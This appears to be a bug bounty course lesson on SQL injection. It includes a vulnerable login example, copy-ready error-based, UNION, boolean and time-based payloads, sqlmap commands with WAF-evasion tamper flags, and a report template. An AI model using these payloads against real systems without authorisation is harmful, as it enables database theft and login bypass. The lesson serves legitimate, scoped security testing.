Bug Bounty Course -- Day 9 of 60
15%

Day 9: SQL Injection for Bug Bounty 2026 — Manual Testing + SQLmap Complete Guide

Mr Elite 14 min read Bug Bounty Course -- Day 9
Day 9: SQL Injection for Bug Bounty 2026 — Manual Testing + SQLmap Complete Guide

DAY 9 OF 60
BUG BOUNTY MASTERY COURSE
FREE — ALL 60 DAYS

View Full Course →

🔴 Day 9 — SQL Injection for Bug Bounty
Day 60 — Pro Hunter $$$$

🔐 AUTHORISED TARGETS ONLY

All SQL injection testing in this guide is performed on targets you are explicitly authorised to test — your own lab environment, DVWA, TryHackMe, HackTheBox, or in-scope bug bounty programmes. Never test SQLi against systems you do not have written permission to test. Extracting real user data beyond what is necessary to confirm a vulnerability may violate programme policies and data protection law.

SQL injection for bug bounty is the vulnerability that turns a single quote mark into a $4,500 payout. It has been in the OWASP Top 10 for over two decades. It still exists in production applications in 2026. And when you find it — really find it, in scope, with data extraction confirmed — it is almost always a Critical or High severity finding that programmes pay serious money for. Day 9 teaches you the complete methodology: manual discovery, every injection type, SQLmap automation, and exactly how to write the report.

🎯
After reading Day 9, you will be able to:
Identify every SQL injection entry point on a target application · Manually confirm SQLi using boolean and error-based probes in Burp Suite · Extract database version and table names using UNION and blind techniques · Run SQLmap safely within bug bounty scope · Write a High/Critical SQLi report that converts to maximum payout

~22
min read

📊 QUICK POLL — Day 9
How familiar are you with SQL injection going into today?



What Is SQL Injection & Why It’s a Bug Bounty P1 Goldmine

SQL injection for bug bounty is the attack class where unsanitised user input breaks out of its intended data context and gets executed as a SQL command by the database. It sounds technical. In practice it often starts with a single character: a quote mark '. You type it into a search box or a login field. The application throws a database error. That error tells you the input is being interpreted as code rather than data. That is the moment you have found SQL injection.

SQL injection has been the number one web attack technique for over two decades. It sits in OWASP Top 10 A03:2021 — Injection. It is responsible for some of the largest data breaches in history. It still exists in 2026 because developers continue building applications that concatenate user input directly into SQL queries. Your job as a bug bounty hunter is to find those places before malicious actors do.

securityelites.com

SQL INJECTION — BUG BOUNTY PAYOUT GUIDE 2026
LOW IMPACT SQLi
$300–$1,000
Read-only access, limited table scope, no PII exposure

HIGH IMPACT SQLi
$1,000–$8,000
PII accessible, user credentials, financial data exposure

CRITICAL SQLi
$8,000–$30,000+
Auth bypass, RCE via xp_cmdshell, full DB dump possible

REAL 2026 PAYOUTS — HACKERONE PUBLIC DISCLOSURES
🟢 Shopify — SQLi in search: $3,500
🟡 GitLab — Blind SQLi via API: $4,000
🔴 Uber — SQLi → DB dump: $10,000
🟣 DoD — Auth bypass via SQLi: $14,000

SQL Injection Bug Bounty Payout Guide — payout ranges by impact level, with real 2026 HackerOne disclosed payouts. SQLi consistently earns more than XSS and IDOR at equivalent scope because of its potential to expose entire databases.

The reason SQLi pays so well is simple: it fails the same way at every scale. A startup and a Fortune 500 company can both have a login form that concatenates user input into a SQL query. When you find it in the Fortune 500’s programme, you’re holding the keys to their entire user database. That is why programmes pay Critical rates for SQL injection — the vulnerability represents an architecture-level failure with database-wide consequences.

How SQL Injection Works — The Database Behind Every Login

To find SQL injection you need to understand what the vulnerable code looks like. Almost every web application uses a database. When you log in, search for a product, or load a user profile, the application sends a SQL query to the database. In a vulnerable application, your input is pasted directly into that query string rather than being handled as separate data.

Here is the classic vulnerable login form. The developer builds the query by concatenating strings — your username and password are placed directly inside the SQL. There is no parameterisation, no prepared statement, no escaping. Your input is the SQL:

⚠️ Vulnerable PHP Code — String Concatenation (DO NOT USE)
// VULNERABLE — user input pasted directly into SQL string
$username = $_POST['username'];
$password = $_POST['password'];
$query   = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";

// ATTACKER INPUT: username = admin'--
// RESULTING QUERY:
SELECT * FROM users WHERE username = 'admin'-- ' AND password = 'anything'
// The -- comments out the password check entirely. Login bypassed.

// ─────────────────────────────────────────────────────────────────
// SAFE — Prepared Statement (parameterised query)
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
$stmt->execute([$username, $password]);

// User input is NEVER interpreted as SQL — injection is impossible

The SQL comment sequence -- tells the database to ignore everything that follows. By injecting admin'-- as the username, an attacker closes the username string early and comments out the password check entirely. The application logs in as admin with no valid password. This is the most fundamental form of authentication bypass via SQL injection — and it works on any application that concatenates input into queries.

💡 TIP — From Day 5 (Burp Suite Deep Dive)

Every injection test in this guide uses Burp Suite Repeater — the same tool you set up and practised with on Day 5. Capture the request in Burp Proxy, send it to Repeater, and modify parameters freely without having to interact with the browser UI. This gives you clean, repeatable testing with full control over every character you send.

Five Types of SQL Injection You Need to Know

SQL injection is not a single technique — it is a class of vulnerabilities that manifests differently depending on how the application handles and returns data. Knowing which type you are dealing with determines the extraction technique you use. Here are all five types with their bug bounty significance:

securityelites.com

SQL INJECTION TYPES — COMPLETE REFERENCE — DAY 9
TypeHow It WorksSignal to Look ForBug Bounty Severity
Error-BasedDB error messages returned in response — contain extracted dataMySQL error / ODBC error in page outputHIGH
UNION-BasedAppend UNION SELECT to inject a second query, data returned in page outputData visible in page after quote injectionCRITICAL
Blind BooleanNo output returned — infer data by observing true/false page differencesPage changes between AND 1=1 and AND 1=2HIGH
Time-Based BlindNo output — infer data by measuring response delays with SLEEP()5 second delay on SLEEP(5) payloadHIGH
Out-of-BandData exfiltrated via DNS or HTTP to attacker-controlled serverDNS lookup from server to your Interactsh listenerCRITICAL
SQL Injection Types — five categories from most visible (Error-Based) to most covert (Out-of-Band). In bug bounty, UNION-based and Error-based are the most common confirmed findings because they produce visible output. Blind techniques require more patience but are just as exploitable and pay equally.

Finding SQL Injection Entry Points — The Hunter’s Recon Checklist

SQL injection lives wherever user-controlled input touches a database query. Before you start sending payloads, map every input on the application that could be interacting with a database. Use Burp Proxy HTTP History — every request the application makes while you browse normally is captured there. Look for these injection candidates:

securityelites.com

SQLi ENTRY POINT MAP — WHERE TO LOOK FIRST
🔢 URL PARAMETERS
/item?id=42
/user?uid=1001
/search?q=laptop
/order?sort=price
/filter?cat=3&page=2

📬 POST BODY FIELDS
username=admin
password=secret
email=user@x.com
coupon_code=FREE10
comment=Great post

🍪 HEADERS & COOKIES
Cookie: user_id=42
Cookie: session=abc
X-Forwarded-For:
User-Agent: Mozilla
Referer: /login

🔗 JSON / API BODY
{“id”: “42”}
{“filter”: “name”}
{“order_by”: “date”}
{“search”: “term”}
{“limit”: “10”}

HIGH-VALUE TARGETS — TEST THESE FIRST
✅ Login / authentication forms
✅ Search boxes and product filters
✅ Product/user/order ID parameters
✅ Sort and order-by parameters
✅ Forgot password email lookup
✅ API endpoints returning DB records

SQL Injection Entry Point Map — four categories of user-controlled input to systematically test. The highest-value targets are login forms (authentication bypass), ID parameters (data extraction), and search/filter parameters (often poorly sanitised). Test all four categories on every application.
Burp Suite — Finding All Parameters for SQLi Testing
# In Burp Suite — use these views to find all injection candidates:

# 1. HTTP History → filter by in-scope only
#    Look for GET params: /search?q=   /item?id=   /sort?by=

# 2. Target → Sitemap → right-click → Engagement Tools → Find comments
#    Dev comments sometimes reveal DB table names and parameter names

# 3. HTTP History → select any request → right-click → Send to Intruder
#    Intruder → Positions → Auto-select §§ marks every testable parameter

# 4. For JSON APIs — use Content-Type: application/json
#    Burp automatically highlights JSON values as parameters

# Quick probe command (manual) — send to EVERY interesting parameter:
'    -- single quote: basic break test
''   -- double quote: close and reopen string
;    -- statement terminator
)    -- close parenthesis
--   -- comment sequence

Manual SQLi Testing with Burp Suite — Step by Step

Manual testing is what separates a bug bounty hunter from a scanner. Scanners generate noise. Manual testing produces confirmed, reportable findings with minimal footprint. The workflow is always the same: probe, confirm, classify, extract the minimum to prove impact, document.

Step 1 — The Quote Probe

Send a single quote to every parameter you identified. A SQL error in the response means the input is reaching a SQL query unsanitised. No error means either the input is sanitised or the SQL error is suppressed — you’ll need blind techniques. An unexpected response change (page loads differently, records disappear, an empty result set) is also a signal worth investigating.

Burp Repeater — Initial Quote Probe
# Original request — normal parameter
GET /products?category=Electronics HTTP/1.1
Host: target.com
Cookie: session=YOUR_SESSION_TOKEN

# Modified — add single quote to parameter value
GET /products?category=Electronics' HTTP/1.1
Host: target.com
Cookie: session=YOUR_SESSION_TOKEN

# Responses to look for:
→ "You have an error in your SQL syntax"    ← SQLi CONFIRMED (MySQL)
→ "Unclosed quotation mark after string"    ← SQLi CONFIRMED (MSSQL)
→ "ORA-01756: quoted string not properly"   ← SQLi CONFIRMED (Oracle)
→ "pg_query(): Query failed"                ← SQLi CONFIRMED (PostgreSQL)
→ Page shows 0 results (was showing items)  ← Possible blind SQLi
→ Same page, no change                      ← Try other parameters

Step 2 — Boolean Confirmation

A single error confirms the input is unsanitised. Boolean payloads confirm the injection is actually controllable — that you can change the SQL logic and the application behaves accordingly. These two payloads are the gold standard of SQLi confirmation:

Boolean Confirmation — True vs False
# TRUE condition — should return normal results
GET /products?category=Electronics' AND '1'='1
# Resulting SQL: WHERE category='Electronics' AND '1'='1' ← always true
# Expected: normal page output (same as without the injection)

# FALSE condition — should return empty/different results
GET /products?category=Electronics' AND '1'='2
# Resulting SQL: WHERE category='Electronics' AND '1'='2' ← always false
# Expected: empty results, error, or completely different output

# ✅ If TRUE = normal output AND FALSE = different output → SQL INJECTION CONFIRMED
# The application is evaluating your SQL conditions — you control the query

# Comment-based variants (try all — different DBs prefer different syntax)
Electronics'-- -           # MySQL comment (space required after --)
Electronics'#              # MySQL hash comment
Electronics'/*             # MySQL block comment open
Electronics';--            # MSSQL / PostgreSQL

⚡ SECTION QUIZ — Day 9 Part 1
A single quote injection returns this response: "You have an error in your SQL syntax near ''". What does this confirm?



Error-Based SQL Injection — Reading the Database’s Mistakes

Error-based injection is the most forgiving type for a beginner — the database tells you what went wrong and sometimes what data it holds. In MySQL, functions like extractvalue() and updatexml() deliberately trigger errors that embed database values inside the error message. You’re using the error output channel as a data exfiltration channel.

Error-Based Extraction Payloads — MySQL (Authorised Targets Only)
# Extract database version — confirm injection + identify DB type
' AND extractvalue(1,concat(0x7e,@@version))-- -
# Error output: XPATH syntax error: '~8.0.32-MySQL Community Server'
# ↑ The ~ prefix (0x7e) forces the error containing the version string

# Extract current database name
' AND extractvalue(1,concat(0x7e,database()))-- -
# Error output: XPATH syntax error: '~production_db'

# Extract table names from current database
' AND extractvalue(1,concat(0x7e,(SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)))-- -
# Error output: XPATH syntax error: '~users'   (first table)
# Change LIMIT 0,1 → LIMIT 1,1 → LIMIT 2,1 to enumerate all tables

# Alternative: updatexml() — same technique, different function
' AND updatexml(1,concat(0x7e,@@version),1)-- -

# ─────────────────────────────────────────────────────────────────
# STOP HERE for bug bounty proof — DB version + DB name + tables
# is sufficient to prove the vulnerability without touching user data
⚠️ BUG BOUNTY RULE — Extract Only Proof, Not Data

Stop extraction at database version, database name, and table names. This is all you need to prove SQL injection exists and earns you the full Critical payout. Never extract usernames, password hashes, email addresses, or payment data — extracting real user records likely violates the programme’s safe harbour clause and may violate GDPR. Confirm the vulnerability, screenshot the proof, report it immediately.

UNION-Based SQL Injection — Extracting Data Column by Column

UNION-based injection is the highest-impact SQLi technique when output is visible in the page. The SQL UNION operator combines the results of two SELECT statements. By injecting a second SELECT, you piggyback your extraction query onto the application’s legitimate query — and your extracted data appears in the page alongside (or instead of) the normal output.

The critical prerequisite: your injected SELECT must return the same number of columns as the original query, with compatible data types. Two steps always come before extraction: determine the column count, then identify which columns are reflected in the output.

securityelites.com

UNION-BASED SQLi — COMPLETE WORKFLOW — securityelites.com

STEP 1 — Find the Column Count (ORDER BY Method)
‘ ORDER BY 1– – ← no error (1 column exists)
‘ ORDER BY 2– – ← no error (2 columns exist)
‘ ORDER BY 3– – ← no error (3 columns exist)
‘ ORDER BY 4– – ← ERROR! (only 3 columns) → column count = 3

STEP 2 — Find Which Columns Are Reflected (NULL Probe)
‘ UNION SELECT ‘SE1’,NULL,NULL– –
‘ UNION SELECT NULL,’SE2’,NULL– – ← ‘SE2’ appears in page output! Col 2 is reflected
‘ UNION SELECT NULL,NULL,’SE3’– –

STEP 3 — Extract Data via Reflected Column
# Extract DB version in the reflected column (col 2)
‘ UNION SELECT NULL,@@version,NULL– –
# Page output now contains: “8.0.32-MySQL Community Server”
# Extract database name
‘ UNION SELECT NULL,database(),NULL– –
# Extract table names (proof level — stop here for bug bounty)
‘ UNION SELECT NULL,group_concat(table_name),NULL FROM information_schema.tables WHERE table_schema=database()– –
# Output: “users,orders,products,sessions,admin_logs”

UNION-Based SQL Injection Workflow — three mandatory steps: (1) determine column count with ORDER BY until error, (2) find which column reflects in page output using string markers, (3) replace marker with extraction payload. STOP at database name and table list for responsible bug bounty reporting.

Blind Boolean SQLi — Inferring Data Without Output

Most modern applications suppress error messages. They might log the SQL error internally but show a generic “Something went wrong” to the user. You have no output channel. This does not mean SQL injection is absent — it means you need a different detection technique. Blind boolean injection reads the database bit by bit, using the application’s behaviour (shows results vs shows nothing) as a true/false oracle.

The approach is methodical: ask the database a yes/no question inside your SQL payload. A question that evaluates to true produces one page response. A question that evaluates to false produces a different one. By asking enough binary questions — “Is the first character of the database name greater than ‘M’?” — you can reconstruct any string from the database character by character.

Blind Boolean SQLi — Manual Technique
# Baseline — normal response (5 products returned)
GET /products?category=Electronics
# → 200 OK, 5 product cards displayed

# TRUE condition — same as baseline
GET /products?category=Electronics' AND 1=1-- -
# → 200 OK, 5 product cards displayed ← SAME AS BASELINE = true

# FALSE condition — different from baseline
GET /products?category=Electronics' AND 1=2-- -
# → 200 OK, 0 products displayed ← DIFFERENT = false — BLIND SQLi CONFIRMED

# ─────────────────────────────────────────────────────────────────
# Now ask real questions about the database

# Q: Does the database name start with a letter > 'M'? (ASCII 77)
' AND (SELECT ASCII(SUBSTRING(database(),1,1))) > 77-- -
# TRUE (5 products) → first char ASCII > 77 → not A-M range
# FALSE (0 products) → first char ASCII <= 77 → in A-M range

# Binary search narrows it down — 7 requests to identify one character
# SQLmap automates this entirely (covered next section)
💡 TIP — Response Differentiators for Blind SQLi

The true/false difference does not have to be dramatic. Even a 20-byte difference in response length between true and false conditions is a valid blind SQLi signal. In Burp HTTP History, add the “Length” column and compare true-condition requests against false-condition requests. Consistent length differences are your oracle. Burp Intruder’s Grep Extract feature can automate reading these differences across payloads.

Time-Based Blind SQLi — Using SLEEP() as an Oracle

When even the boolean output differences are invisible — the application returns identical responses regardless of true or false conditions — time-based injection is your last resort. Instead of using page content as the oracle, you use time. If your SQL condition is true, the database sleeps for a defined number of seconds before responding. That delay is measurable even when no data is returned in the response body.

Time-based techniques are slower and noisier than boolean or UNION methods, but they work against applications that return no output whatsoever — including JSON APIs that always return the same empty object, or backend processing endpoints that return only a success status code.

Time-Based Blind SQLi — Database-Specific Payloads
# MySQL — SLEEP() function
' AND SLEEP(5)-- -
# If response takes ~5 seconds → SQLi confirmed (MySQL)

# MSSQL — WAITFOR DELAY
'; WAITFOR DELAY '0:0:5'-- -
# If response takes ~5 seconds → SQLi confirmed (MSSQL)

# PostgreSQL — pg_sleep()
' AND 1=1 AND (SELECT pg_sleep(5))-- -
# If response takes ~5 seconds → SQLi confirmed (PostgreSQL)

# Oracle — DBMS_PIPE.RECEIVE_MESSAGE
' AND 1=1 AND (SELECT DBMS_PIPE.RECEIVE_MESSAGE(chr(65),5) FROM dual)-- -

# Conditional delay — TRUE condition triggers sleep, FALSE does not
# Confirms you have SQL control, not just a slow server:
' AND IF(1=1, SLEEP(5), 0)-- -   # 5-second delay ← true condition
' AND IF(1=2, SLEEP(5), 0)-- -   # immediate response ← false condition
# Different timing between true/false = blind time-based SQLi confirmed

⚡ SECTION QUIZ — Day 9 Part 2
You inject ' AND IF(1=1, SLEEP(5), 0)-- - and the response takes 5 seconds. You inject ' AND IF(1=2, SLEEP(5), 0)-- - and it responds instantly. What does this prove?



SQLmap — The Automation Layer for Bug Bounty

SQLmap is the industry-standard SQL injection automation tool. It detects and exploits all five SQLi types, handles WAF bypass, and can extract database schema automatically. In bug bounty, SQLmap is a force multiplier — it validates findings you discovered manually and handles the tedious character-by-character extraction of blind SQLi at speed.

Before you run SQLmap on any target, always check the programme’s rules of engagement. Some explicitly prohibit automated scanners. Many allow it when used responsibly — low rate, no aggressive flags, stop at confirmation rather than dumping data. The workflow below is optimised for responsible bug bounty use. You can also reference the full SQLmap Tutorial from the Kali Linux Course for a deeper technical dive.

securityelites.com

SQLMAP — BUG BOUNTY COMMAND REFERENCE — DAY 9
BASIC DETECTION — START HERE
# Test a GET parameter (safe, level 1, risk 1)
sqlmap -u “https://target.com/items?id=1” –batch –level=1 –risk=1
# Test a POST request (save the request from Burp as request.txt)
sqlmap -r request.txt –batch –level=1 –risk=1
# Test a specific parameter only
sqlmap -u “https://target.com/search?q=test&cat=1” -p cat –batch

PROOF EXTRACTION (Stop Here for Bug Bounty)
# Get database banner (version proof)
sqlmap -u “https://target.com/items?id=1” –banner –batch
# Get current database name
sqlmap -u “https://target.com/items?id=1” –current-db –batch
# List tables in current DB (proof of scope, not data)
sqlmap -u “https://target.com/items?id=1” –tables –batch

AUTHENTICATION + SESSION HANDLING
# Pass session cookie (for authenticated endpoints)
sqlmap -u “https://target.com/api/user?id=1″ –cookie=”session=YOUR_TOKEN” –batch
# Use Burp-saved request file (recommended — preserves all headers)
sqlmap -r /path/to/burp_request.txt –cookie=”session=YOUR_TOKEN” –batch

WAF BYPASS FLAGS (Use If Blocked)
# Use random User-Agent to avoid WAF fingerprinting
sqlmap -u “URL” –random-agent –batch
# Use tamper scripts for WAF evasion
sqlmap -u “URL” –tamper=space2comment –batch
sqlmap -u “URL” –tamper=between,space2comment –batch
# Slow down to avoid rate limiting (1 request per 2 seconds)
sqlmap -u “URL” –delay=2 –batch

SQLmap Bug Bounty Command Reference — four command groups from basic detection to WAF bypass. For bug bounty, always start with –level=1 –risk=1 –batch and stop at –tables for proof. Never use –dump on a programme’s production database — extract only the minimum proof needed for a valid Critical report.
⚠️ SQLMAP FLAGS TO NEVER USE IN BUG BOUNTY

--dump dumps all data from a table — never use on production. --dump-all dumps every database — absolutely never. --os-shell attempts OS command execution — only on explicitly authorised targets. --level=5 --risk=3 enables highly aggressive payloads that can damage production databases. Stay at level 1, risk 1 for all bug bounty work unless specifically authorised to go higher.

Writing SQLi Bug Bounty Reports That Pay Maximum

A confirmed SQL injection finding is only worth what your report communicates. Triage reviewers read dozens of reports per day. The reports that pay maximum — and pay quickly — are the ones that require zero back-and-forth: the vulnerability is unambiguous, the reproduction steps work the first time, and the impact is spelled out clearly so the reviewer can immediately justify the payout to their security manager.

The same SQL injection reported with a clear template versus a messy paragraph dump has produced 3x payout differences on the same programme. Read the full bug bounty report writing guide alongside this template. Combine both and your SQLi report will pay at the top of the programme’s range every time.

securityelites.com

SQL INJECTION BUG BOUNTY REPORT TEMPLATE — DAY 9
TITLE
[SQL Injection] UNION-based SQLi in /products?category= parameter allows unauthenticated database version and schema enumeration

SUMMARY
The category parameter in the product search endpoint is vulnerable to UNION-based SQL injection. The input is concatenated directly into a SQL query without parameterisation. An unauthenticated attacker can extract the database version, enumerate all table names, and potentially access any data stored in the connected database.

STEPS TO REPRODUCE
1. Open Burp Suite and navigate to https://target.com/products?category=Electronics
2. Send to Repeater. Append a single quote: category=Electronics' → observe MySQL syntax error in response
3. Determine column count: inject category=Electronics' ORDER BY 3-- - (no error) vs ORDER BY 4 (error) → 3 columns
4. Find reflected column: category=0' UNION SELECT NULL,'SE_TEST',NULL-- - → string ‘SE_TEST’ appears in page
5. Extract DB version: category=0' UNION SELECT NULL,@@version,NULL-- - → page displays: 8.0.32-MySQL Community Server
6. Extract DB name: category=0' UNION SELECT NULL,database(),NULL-- - → page displays: production_db
7. Extract tables: category=0' UNION SELECT NULL,group_concat(table_name),NULL FROM information_schema.tables WHERE table_schema=database()-- - → users, orders, payments, admin_logs

IMPACT
→ Full database schema enumeration (all table names confirmed)
→ Database version and type disclosed
→ Tables include: users, orders, payments, admin_logs — highly sensitive data accessible
→ No authentication required — exploitable by any internet user
→ Potential for full data extraction, authentication bypass, and data modification

CVSS 3.1: 9.8 CRITICAL CWE-89: SQL Injection

REMEDIATION
Replace string concatenation with parameterised queries (prepared statements) for all SQL query construction. Implement an allowlist for the category parameter — only permit known-valid category values. Disable detailed SQL error messages in production. Reference: OWASP SQL Injection Prevention Cheat Sheet.

SQL Injection Bug Bounty Report Template — the five-section structure that maximises payout speed and amount. Critical details: the title specifies injection type + endpoint + impact. Steps are numbered and include exact payloads. Impact lists specific table names found (not data). CVSS 3.1 score and CWE-89 signal professional quality to triage reviewers.

⚡ SECTION QUIZ — Day 9 Part 3
You’ve confirmed SQL injection and extracted the database version and table list. The tables include a users table. What is the correct next step for bug bounty?



📋 COMMANDS USED TODAY — DAY 9
SQL Injection for Bug Bounty — Complete Reference Card

# ── PROBE PAYLOADS ───────────────────────────────────────────────
'                                         # Basic quote probe
' AND 1=1-- -                             # Boolean TRUE
' AND 1=2-- -                             # Boolean FALSE

# ── ERROR-BASED (MySQL) ──────────────────────────────────────────
' AND extractvalue(1,concat(0x7e,@@version))-- -
' AND extractvalue(1,concat(0x7e,database()))-- -
' AND extractvalue(1,concat(0x7e,(SELECT table_name FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)))-- -

# ── UNION-BASED ──────────────────────────────────────────────────
' ORDER BY 1-- -                          # Find column count
' UNION SELECT NULL,'SE_TEST',NULL-- -    # Find reflected column
' UNION SELECT NULL,@@version,NULL-- -    # Extract version
' UNION SELECT NULL,database(),NULL-- -   # Extract DB name
' UNION SELECT NULL,group_concat(table_name),NULL FROM information_schema.tables WHERE table_schema=database()-- -

# ── TIME-BASED BLIND ─────────────────────────────────────────────
' AND SLEEP(5)-- -                        # MySQL
' AND IF(1=1, SLEEP(5), 0)-- -           # Conditional delay
'; WAITFOR DELAY '0:0:5'-- -             # MSSQL

# ── SQLMAP (Responsible Use) ─────────────────────────────────────
sqlmap -u "https://target.com/items?id=1" --batch --level=1 --risk=1
sqlmap -r request.txt --banner --batch
sqlmap -u "URL" --current-db --batch
sqlmap -u "URL" --tables --batch
sqlmap -u "URL" --random-agent --delay=2 --batch
Share on Twitter/X and Discord — tag @SecurityElites 🔴

Finished Day 9? Lock in your progress.

🔴
Day 9 Done. You can now find, confirm,
and report SQL injection for bug bounty.

Day 10 takes a different attack direction: SSRF — Server-Side Request Forgery. Where SQL injection attacks the database, SSRF weaponises the server itself, making it reach internal infrastructure that should never be internet-accessible. Cloud metadata endpoints, internal APIs, admin panels — SSRF unlocks all of them. This is one of the most underrated P1 vulnerability classes in modern bug bounty.

Day 10: SSRF Hunting →

Frequently Asked Questions — Day 9

What is SQL injection in bug bounty hunting?
SQL injection (SQLi) is a vulnerability where user-supplied input is inserted directly into a SQL query without proper sanitisation or parameterisation. An attacker can break out of the intended data context and inject their own SQL commands — reading, modifying, or deleting database data, bypassing authentication, and sometimes achieving remote code execution. In bug bounty, SQLi is rated High to Critical and pays $500–$30,000+ depending on the data accessible and the programme’s reward structure.
Is it safe to use SQLmap in bug bounty programmes?
SQLmap is acceptable in most bug bounty programmes but must be used carefully. Always check the programme’s rules — some explicitly ban automated scanners. When allowed, use SQLmap with --level=1 --risk=1 to start, never use --dump on production databases with real user data, and always use the --batch flag to avoid interactive prompts. Stop at confirmation and table list — do not extract real data.
What is the difference between error-based and blind SQL injection?
Error-based SQLi produces visible database error messages in the HTTP response — these errors often contain database version, table names, or extracted data directly. Blind SQLi returns no error messages; instead you infer data by observing changes in application behaviour. Boolean-based blind changes output depending on whether your condition is true or false. Time-based blind uses SLEEP() to cause a measurable response delay when a condition is true. Blind techniques are slower but just as exploitable and pay equally.
How do I find the column count for a UNION SQL injection attack?
Two methods: ORDER BY enumeration — inject ' ORDER BY 1-- -, ORDER BY 2-- -, ORDER BY 3-- - incrementing until the page errors — error at 4 means 3 columns. Or NULL method — inject UNION SELECT NULL-- -, UNION SELECT NULL,NULL-- - until no error. Once you know the count, replace NULLs with your extraction payload.
What data should I extract to prove SQL injection in a bug bounty report?
Extract only what is necessary to confirm the vulnerability: database version (@@version), database name (database()), and the list of tables from information_schema. Do NOT extract usernames, passwords, emails, or any real user PII — this violates most programme policies and may be illegal. Those three items are sufficient for a Critical CVSS 9.8 report.
Why does SQL injection pay so highly in bug bounty?
SQL injection is rated High to Critical because of its potential impact: full database read access means every user’s data is exposed, write access allows data modification and account takeovers, and some configurations allow OS command execution. The vulnerability represents a complete failure of input validation architecture — it’s not a misconfiguration but a code-level flaw affecting every user. Programmes pay between $300 for limited-scope SQLi and $30,000+ for SQLi with access to sensitive PII or payment data.

← Day 8: IDOR Bug Bounty

60-DAY BUG BOUNTY MASTERY — DAY 9

9 of 60 days complete

Day 10: SSRF Hunting →

ME
Mr Elite
Founder, SecurityElites.com | Bug Bounty Hunter | Educator

SQL injection was the first High-severity bug I ever found in a real programme. I was testing a product search endpoint on a HackerOne programme that had been live for four years. One quote mark. One error message. A single UNION query later, I had the database version, database name, and twelve table names on screen — including one called payment_records. I stopped there, wrote the report, and received $3,200 eight days later. The methodology you learned today is exactly what I used. Day 10 next — SSRF is waiting.

blind sql injection manual sqli testing sql injection bug bounty 2026 sqli report template sqlmap tutorial bug bounty union based sql injection
Join free to earn XP for reading this article Track your progress, build streaks and compete on the leaderboard.
Join Free
Lokesh N. Singh aka Mr Elite
Lokesh N. Singh aka Mr Elite
Founder, Securityelites · AI Red Team Educator
Founder of Securityelites and creator of the SE-ARTCP credential. Working penetration tester focused on AI red team, prompt injection research, and LLM security education.
Linkedin Twitter
About Lokesh ->

Leave a Comment

Your email address will not be published. Required fields are marked *